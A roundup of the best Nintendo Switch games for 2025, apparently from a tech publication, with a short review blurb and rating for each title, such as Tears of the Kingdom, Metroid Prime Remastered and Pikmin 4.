    Bayonetta Origins: Cereza and the Lost Demon

    4.0 Excellent

    Bayonetta Origins: Cereza and the Lost Demon isn’t a hard-hitting, nonstop action game like the main Bayonetta trilogy. Instead, this is a relatively relaxed adventure game full of puzzles and gorgeous storybook visuals. Young witch Cereza teams up with a young demon, Cheshire, to tackle challenges neither could complete alone. Although the combat isn’t quite as complex as in the mainline Bayo games, there’s still plenty of flair to the faerie fights.
    Bayonetta Origins: Cereza and the Lost Demon review

    Bravely Default II

    Bravely Default II4.0 Excellent

    Modern Final Fantasy games have become their own beasts, but games like Bravely Default II remind us why we fell in love with those classic Square Enix JRPGs. In battle, you can either perform multiple actions at onceor wait to save up for later turns, which opens up many strategic possibilities. On Switch, the diorama world looks more beautiful and nostalgic than ever.

    Cadence of Hyrule: Crypt of the NecroDancer

    Cadence of Hyrule: Crypt of the NecroDancer4.0 Excellent

    Crypt of the NecroDancer was a surprise indie hit in 2015, catching gamers' eyes and ears with its combination of roguelike randomized dungeon exploration with rhythm game beat-keeping. It hit the Nintendo Switch in 2018, and now it's back in a new and much more Nintendo-specific form: Cadence of Hyrule: Crypt of the NecroDancer, a title that injects rhythm game mechanics into The Legend of Zelda. This Switch game seamlessly combines Zelda and Crypt of the NecroDancer, creating a surprisingly accessible and thoroughly enjoyable experience played to the beat of Zelda's classic and music.

    Cassette Beasts

    4.0 Excellent

    Pokémon doesn't have a monopoly on monster catching. Cassette Beasts is a stylish, indie RPG that puts its own spin on collecting creatures and pitting them against each other in combat. The open world has many quests, the fighting mechanics have the extra depth that experienced players crave, and the story veers off in cool, surreal directions. Most importantly, there are some great monster designs, like ghostly sheep and living bullets.
    Cassette Beasts review

    Clubhouse Games: 51 Worldwide Classics

    Clubhouse Games: 51 Worldwide Classics4.0 Excellent

    Forget fancy new video games. Sometimes you just want to play chess, solitaire, or one of the other virtual vintage games that make up this classic compilation. Not only is this a convenient way to play some of history’s most enduring games with friends, but Clubhouse Games: 51 Worldwide Classics does a great job educating you on that history, including the fascinating early Hanafuda history of Nintendo itself.

    Game Builder Garage

    Game Builder Garage4.5 Excellent

    If you thought Super Mario Maker was a great way to learn about game development, give Game Builder Garage a spin. This incredibly powerful 3D game creation tool lets you make anything from platformers to racing games to puzzle mysteries. Thorough, friendly tutorials explain the robust “Nodon” coding language, so even novices can create hitboxes and manipulate the Z-axis like pros.

    Donkey Kong Country: Tropical Freeze

    Donkey Kong Country: Tropical Freeze4.0 Excellent

    The Switch has gotten a reputation as a machine for game ports, and there's nothing wrong with that. The Wii U wasn't the massive hit the Wii was, but it still had several excellent games that went underappreciated in their time. Donkey Kong Country: Tropical Freeze is one of them, a sequel to Donkey Kong Country Returns with even more challenge and variety. The Switch version of this game adds Funky Kong Mode, an easier setting and new playable characterthat makes the surprisingly brutal platforming feel a little less punishing.

    Hades

    HadesHades takes the punishing and divisive roguelike genre and masterfully twists it into one of the year's most addictive games. Fighting your way out of the Greek underworld with randomly changing skills and weapons feels incredible. The family drama at the game’s core gives you that extra narrative push to keep going. Plus, everyone is smoking hot.

    Indivisible

    IndivisibleWhile many role-playing games draw their influences from Western folklore, even RPGs made in Japan, Indivisible carves out a unique identity with a fresh Southeast Asian flavor. The 2D animation is exquisite, as we would expect from the developer of Skullgirls. Gameplay is a mix of nonlinear spaces to explore and enemies to defeat in tactical battles. Of the two types of play, the exploration sections impress us more. In these bits you find your way forward by using an axe to fling yourself up walls or by shooting arrows to blind sentries. That's just more satisfying than the frantic messes the fights, caught awkwardly between turn-based and real-time combat, can turn into.  

    Kirby's Return to Dream Land Deluxe

    Kirby’s Return to Dream Land Deluxe4.5 Excellent

    Kirby’s Return to Dreamland is a traditional, side-scrolling adventure compared to Kirby’s more radical outings. Still, it’s an excellent showcase of what makes even a normal Kirby game irresistible. This Deluxe version enhances the Wii co-op classic with a sweet, new art style; extra powers; and an original epilogue.
    Kirby’s Return to Dream Land Deluxereview

    Kirby and the Forgotten Land

    Kirby and the Forgotten Land4.0 Excellent

    Kirby and the Forgotten Land finally gives the pink puffball the epic 3D adventure that Mario, Link, and Samus got years ago. Float through the skies in creative levels bursting with secrets. Upgrade familiar powers, such as hammers and swords, into formidable new forms. Or just sit back and marvel at how Nintendo made the post-apocalypse look so cute.

    Kirby Star Allies

    Kirby Star Allies4.0 Excellent

    Kirby games are always fun. Whether they're the simple platformers like Kirby's Adventure or weirdly gimmicky experiences like Kirby's Dream Course, every first-party experience with Nintendo's pink puff ball has been enjoyable. Kirby Star Allies is no different, with a lighthearted campaign filled with colorful friends and abilities, surprisingly challenging extra modes to unlock, and support for up to four players at once. Get on the Friend Train!

    The Legend of Zelda: Breath of the Wild

    The Legend of Zelda: Breath of the Wild4.5 Excellent

    Hyrule is in danger again, and Link must save it. That's been the theme for nearly every Legend of Zelda game, and it's still the case in The Legend of Zelda: Breath of the Wild. The series' basic premise and Link/Zelda/Ganon dynamic are present, but nearly everything else is different. The classic Zelda dungeon-exploration structure is replaced by a huge open world that's filled with destructible weapons, monsters, puzzles, and quests. Breath of the Wild's scope is one previously unseen in the Zelda series, and Nintendo executes the adventure-filled world with aplomb.

    The Legend of Zelda: Echoes of Wisdom

    The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite

    4.5 Excellent

    The Legend of Zelda: Echoes of Wisdom turns Nintendo's epic franchise on its head in more ways than one. Instead of the swordsman, Link, you play as Princess Zelda. Likewise, you don't directly attack enemies; you summon useful items and foes to aid you on the mission. The game takes the creative, improv spirit of Breath of the Wild and applies it to a classic 2D top-down Zelda adventure with delightful results. Plus, it just looks adorable.
    The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review

    The Legend of Zelda: Skyward Sword HD

    The Legend of Zelda: Skyward Sword HD3.5 Good

    No Zelda games are terrible, but no game polarizes the fan base quite like Skyward Sword. Fortunately, this HD remaster speeds up the pacing, enhances the graphics, and offers a button-based control scheme if you don’t care for motion controls. The structure feels especially linear in a post-Breath of the Wild world, but Zelda’s origin story is still worth experiencing.

    The Legend of Zelda: Tears of the Kingdom

    The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite

    5.0 Outstanding

    At launch, it was tough to imagine the Switch ever getting another game as good as Breath of the Wild. But years later, The Legend of Zelda: Tears of the Kingdom delivers everything we could have possibly wanted and more in this direct sequel to one of the greatest games ever made. Exploring the skies and underground caves makes Hyrule more vast than ever. New powers let you break the world apart and rebuild it as you see fit. Tears of the Kingdom is an irresistible, hypnotic adventure, and an absolute must-play for all RPG fans.
    The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite review

    Lego Star Wars: The Skywalker Saga

    Lego Star Wars: The Skywalker Saga4.0 Excellent

    Who knows what the future holds for Star Wars, but Lego Star Wars: The Skywalker Saga provides a terrific toybox take on Episodes I-IX. The Lego recreations of all nine movies gives you plenty to experience as you blast baddies and solve Force puzzles. But what really makes this game so special is how it turns the entire Star Wars galaxy into an open world to explore, whether it’s on colorful planets or through the vastness of outer space in your trusty starfighter.
    Lego Star Wars: The Skywalker Sagareview

    Luigi's Mansion 3

    Luigi's Mansion 3 - Nintendo Switch Standard Edition

    What started as a weirdly specific parody of Ghostbusters and Resident Evil has become of one the finest Mario spin-off adventures. Luigi’s spooky journey throughout a haunted hotel is arguably the most visually stunning game on the Nintendo Switch. Along with sucking up ghosts, you can now slam themto death and shoot plungers to pull apart the scenery. Your greatest, and grossest, tool has to be Gooigi. This slimy green doppelgänger expands your puzzle-solving powers and provides an easy option for younger co-op partners.

    Lumines Remastered

    Lumines Remastered4.5 Excellent

    Puyo Puyo Tetris is great for classic, competitive block-dropping, but it's a bit overly perky and anime-ish to really relax to. Lumines Remastered is the ultimate chill-out block-dropper, syncing the mesmerizing pattern matching to dozens of hypnotic electronic and trance tracks. Load it on your Switch, put on your favorite headphones, and space out while you build huge combos.

    Mario & Luigi: Brothership

    Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite

    4.0 Excellent

    Mario & Luigi: Brothership revives a Mario RPG subseries as a grand nautical adventure. The plumbers sail the seas, reconnecting scattered islands and battling foes with familiar, frenetic turn-based combat. On Nintendo Switch, the visuals and animations turn Mario and Luigi into cartoon-like characters.
    Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review

    Mario + Rabbids: Kingdom Battle

    Mario + Rabbids: Kingdom Battle4.0 Excellent

    Before Minions, there were Rabbids, Ubisoft's manic, sublingual, noseless horde spawned from Rayman: Raving Rabbids. Then the weird, bug-eyed, rabbit-like creatures caused havoc in their own game series. Now, they're running around Mario's stomping grounds in Mario + Rabbids: Kingdom Battle. This strategy-RPG combines two cartoonish worlds with satisfyingly deep, XCOM-like gameplay for a very fun and strange experience. It's a combination of styles that work much, much better than you'd expect.

    Mario + Rabbids Sparks of Hope

    Mario + Rabbids Sparks of Hope4.0 Excellent

    Mario + Rabbids Kingdom Battle proved that these two mascots could come together for excellent, approachable tactics gameplay. Sparks of Hope is more of the same, but even better. Equipping Sparks lets you further customize your squad’s strategic abilities. Wide open levels provide entertaining exploration between the skirmishes.

    Mario Golf: Super Rush

    Mario Golf: Super Rush4.0 Excellent

    Leave it to Mario to find a way to make golf games feel fresh again. Mario Golf: Super Rush’s standout gimmick has golfers teeing off all at once, and then physically running across the course to take their next shot. You still have to plan smart strokes, but you also need to keep an eye on the clock. The lengthy, single-player adventure teaches you the ropes before you head online to face real challengers on the green.

    Mario Kart 8 Deluxe

    Mario Kart 8 Deluxe4.5 Excellent

    Mario Kart 8 stood out as the best-looking Mario Kart game yet when it came out on the Nintendo Wii U. Instead of making a new Mario Kart for the Nintendo Switch, Nintendo brought Mario Kart 8 to its new game system. In the process, Nintendo threw in both previously released DLC packs and made some few welcome changes to its multiplayer options, justifying the game's full retail price. Mario Kart 8 Deluxe is the most robust game in the series so far, and with the optional portability of the Switch, it ranks as a must-own title.

    Mario Strikers: Battle League

    Mario Strikers: Battle League4.0 Excellent

    Mario has played many sports throughout the years, but Mario Strikers: Battle League gives us the arcade soccer chaos fans have craved for more than a decade. It features fast-paced action, while allowing for depth and skill should you choose to push yourself. Customize your characters with stat-changing gear. Join online clubs to compete in ongoing seasons. And no one animates the Mario universe with as much style and attitude as the developers at Next Level Games.
    Mario Strikers: Battle Leaguereview

    Mario Tennis Aces

    Mario Tennis Aces4.0 Excellent

    You don't need to be a sports fan to enjoy Nintendo sports games. If a sport has "Mario" in front of it, it's probably going to be a fun, very unrealistic romp instead of a serious simulation. Mario Tennis Aces is an exciting tennis game not because of any realistic physics, but because of fast, responsive gameplay and strategic mechanics that make matches feel more like rounds in a fighting game than tennis sets.

    Marvel vs. Capcom Fighting Collection: Arcade Classics

    Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch

    4.0 Excellent

    Marvel vs. Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal.
    Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review

    Metal Slug Tactics

    Metal Slug TacticsMetal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes.

    Metroid Dread

    Metroid Dread4.5 Excellent

    After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady.

    Metroid Prime Remastered

    5.0 Outstanding

    Metroid Prime is one of the best games ever made. It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4.
    Metroid Prime Remastered review

    Miitopia

    Miitopia3.5 Good

    Miis can do more than just play Wii Sports. In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.  

    Monster Hunter Stories 2: Wings of Ruin

    Monster Hunter Stories 2: Wings of Ruin4.0 Excellent

    If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here.

    New Pokemon Snap

    New Pokemon Snap4.0 Excellent

    The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see.

    Nickelodeon All-Star Brawl

    Nickelodeon All-Star Brawl4.0 Excellent

    Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games.
    Nickelodeon All-Star Brawlreview

    Nintendo Labo Toy-Con 01 Variety Kit

    Nintendo Labo Toy-Con 01 Variety Kit5.0 Outstanding

    Labo is a weirder concept than the Switch itself. It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations.

    Nintendo Labo: VR Kit

    4.5 Excellent

    It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun for. Add a programming environment on top that lets you create your own 3D games, and you have an impressive package.

    No More Heroes III

    No More Heroes III4.0 Excellent

    No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters. 

    Penny's Big Breakaway

    4.0 Excellent

    The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master.
    Penny's Big Breakaway review

    Pikmin 3 Deluxe

    Pikmin 3 Deluxe3.5 Good

    Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world.

    Pikmin 4

    Pikmin 44.5 Excellent

    Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play.
    Pikmin 4review

    Pizza Tower

    Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind.

    Pokemon Legends: Arceus

    Pokemon Legends: Arceus3.5 Good

    Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet.

    Pokemon Let's Go, Pikachu/Eevee!

    Pokemon: Let's Go, Eevee!

    4.0 Excellent

    If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon.

    Pokémon Scarlet and Violet

    Pokémon Scarlet - Nintendo Switch

    4.0 Excellent

    Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future.

    Pokemon Sword/Shield

    Pokemon Sword4.0 Excellent

    Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. New expansions packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it. 

    Prince of Persia: The Lost Crown

    4.5 Excellent

    Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance.
    Prince of Persia: The Lost Crown review

    Pokemon Unite

    Pokemon Unite3.5 Good

    If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge.

    Puyo Puyo Tetris

    Puyo Puyo Tetris4.5 Excellent

    Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options.

    Red Dead Redemption

    Red Dead RedemptionGrand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars.

    Rebel Galaxy Outlaw

    Rebel Galaxy OutlawRebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself.

    Rocket League

    Rocket LeagueRocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch.

    Shovel Knight: Treasure Trove

    Shovel Knight: Treasure TrovePlatforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove a a game that you should not miss.

    Splatoon 3

    Splatoon 34.0 Excellent

    Splatoon 3 isn't much different than Splatoon 2. However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order.
    Splatoon 3review

    Street Fighter 30th Anniversary Collection

    Street Fighter 30th Anniversary CollectionStreet Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data.

    Streets of Rage 4

    Streets of Rage 4Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair. 

    Super Bomberman R

    Super Bomberman R3.5 Good

    Bomberman's return to console gaming was one of the most surprising moments in the Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh.

    Super Mario 3D All-Stars

    Super Mario 3D All-Stars3.5 Good

    This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can.

    Super Mario 3D World + Bowser's Fury

    Super Mario 3D World + Bowser's Fury4.5 Excellent

    Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario 3D’s adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be.

    Super Mario Bros. Wonder

    Super Mario Bros. Wonder - Nintendo Switch

    4.5 Excellent

    In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder.
    Super Mario Bros. Wonder - Nintendo Switch review

    Super Mario Maker 2

    Super Mario Maker 24.5 Excellent

    Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online.

    Super Mario Odyssey

    Super Mario Odyssey5.0 Outstanding

    In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head.

    Super Mario RPG

    Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch

    4.0 Excellent

    Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is.
    Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch review

    Super Monkey Ball Banana Mania

    Super Monkey Ball Banana Mania4.0 Excellent

    Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games.

    Super Smash Bros. Ultimate

    Super Smash Bros. Ultimate4.5 Excellent

    Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now. 

    Tactics Ogre: Reborn

    Tactics Ogre Reborn4.0 Excellent

    The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics.

    Telling Lies

    Telling LiesHer Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used at communicating through video chat these days. 

    Triangle Strategy

    Triangle Strategy4.0 Excellent

    A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius. 

    Trombone Champ

    Trombone ChampRhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players like baseball cards while trying to solve a sinister riddle. The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level.

    Tokyo Mirage Sessions #FE Encore

    Tokyo Mirage Sessions #FE Encore3.5 Good

    While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs. 

    Unicorn Overlord

    4.5 Excellent

    As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you.
    Unicorn Overlord review

    Void Bastards

    Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time.Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.”Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis.

    WarioWare: Get It Together

    WarioWare: Get It Together4.0 Excellent

    WarioWare is one of Nintendo’s best and most shockingly self-aware franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up!

    Xenoblade Chronicles X: Definitive Edition

    4.0 Excellent

    This late-period Wii U gem finally returns to close out the Nintendo Switch era. A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story.
    Xenoblade Chronicles X: Definitive Edition review
    #best #nintendo #switch #games
    The Best Nintendo Switch Games for 2025
